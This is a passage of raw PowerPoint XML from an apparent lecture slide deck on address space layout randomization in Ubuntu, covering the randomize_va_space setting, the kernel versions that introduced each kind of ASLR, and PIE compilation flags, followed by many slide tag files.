            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>[Ubuntu-Security]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Monaco" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>cat /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Monaco" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>proc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Monaco" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>/sys/kernel/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Monaco" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>randomize_va_space</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Monaco" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Prior to Ubuntu 8.10: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B64926"/>
                </a:solidFill>
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>stack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="B64926"/>
                </a:solidFill>
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>mmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B64926"/>
                </a:solidFill>
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>ASLR)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>In later releases: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B64926"/>
                </a:solidFill>
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>stack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="B64926"/>
                </a:solidFill>
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>mmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="B64926"/>
                </a:solidFill>
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>brk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B64926"/>
                </a:solidFill>
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>ASLR)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" i="1"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rPr>
              <a:t>stack/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>mmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t> ASLR: since kernel 2.6.15 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>(Ubuntu 6.06)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>brk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t> ASLR: since kernel 2.6.26 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>(Ubuntu 8.10)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>exec ASLR: since kernel 2.6.25</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Position Independent Executable (PIE) with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" err="1">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>fPIE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>–pie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0">
              <a:latin typeface="Calibri" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>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t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="348290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00.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101.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102.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103.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104.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105.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106.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107.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108.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109.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10.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111.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112.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113.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114.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115.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116.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117.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118.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119.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20.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121.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122.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123.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124.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125.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126.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127.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128.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129.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30.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131.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="7DXpn44WtTNYp0pRVh6E9Q"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag132.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="Zvi0dCiScEWEOM5GaNk2yy"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag133.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="VcOA9wopjVjhEr6nQsDBG9"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag134.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="1LbDMf7jk7irA6cDsLtNk1"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag135.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="kx8DzNWRoXRMa3owK9i0Bc"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag136.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="YcR0bd0S8TO0qEu8GjnsIk"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag137.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="zNV8eW1jukp8zVMyCIRwPX"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag138.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="YaCK1CtZC8tDD352Z3ROpu"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag139.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="Ai4zm7HFBcvCPKwtUpQuHh"/>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40.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="EViItAINE0ytzkFsfliXwh"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag141.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="80ekvw9rYUMjD9gDE6WOxu"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag142.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="4lacNs9ucKKnNht84cEc2D"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag143.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="HgGwbCHb0IJDWT9jIHitH2"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag144.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="ygmY9v2KaksqETwhgwN1J1"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag145.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="EalAYKtWUzVEIp9csb8gyo"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag146.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="bvffNrqLGGjwCcDzxihdqS"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag147.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="uZb6734BSttfYPkIW1w8Tf"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag148.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="lbNXzTEQYlYi1f4HknH4OQ"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag149.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="3mdOeOlgHiZfEZi9tbX2u7"/>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50.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="3mdOeOlgHiZfEZi9tbX2u7"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag151.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="hGO4EfG8qOqv8rKKEPvIEF"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag152.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="iLB4oaTw6LlW4w09a5zyRa"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag153.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="O9RRpJw7xMsBn2tzQveTHE"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag154.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="9cmdKuFp96N8WsdxLaZZey"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag155.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="ts9XGBe3jXsaZFubY2s7Cm"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag156.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="Of60mjK4UIqAIT4NN3a6MP"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag157.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="FMtx3AcWw6W6ETQFfVjf3K"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag158.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="JoWA7aepXwAYAkxOf9SXcj"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag159.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="ECeaW7OfNxMU25Ast1I79p"/>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60.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="wGjw8qF9n6yqJklWd6AHJ2"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag161.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="bFhrdMGQf49f6yRqZnzDaG"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag162.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="mCmg7wNBwsFtuDeGdSswQt"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag163.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="gteN4N7d85SviF5WF92EyH"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag164.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="zC3ebi9GbDPTlS2js0tjjA"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag165.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="AZkzAgcjtcUzTBKQCP3rUe"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag166.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="GpkdUmH2afnZ24TCHTtS9C"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag167.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="YLYryCoEfRFmiUfnmQBr1F"/>
  <p:tag name="TIMING" val="|6.5|70.9|23.4|28.9"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag168.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="bUyGWZ7aY244ryesN4EwZv"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag169.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="jGLYmjxDgIAiz4SSFow5TD"/>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70.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="hetG8T3xNvGFBSUXDNCkLm"/>
  <p:tag name="TIMING" val="|0.5|0.2|0.2|0.1|0.1|0.2|0.2|0.4"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag171.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="t8YaAUof0TCFoxuGaDAJV5"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag172.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="CUtZXILIsySVKlIYi88xuM"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag173.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="3VtnsWCZK2qow4HAXGuhq3"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag174.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="knUaW77GGZikiJyo37Wnm3"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag175.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="NtM9YcksBoAPQxvzfO6tNP"/>
  <p:tag name="TIMING" val="|1.9|0.3"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag176.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
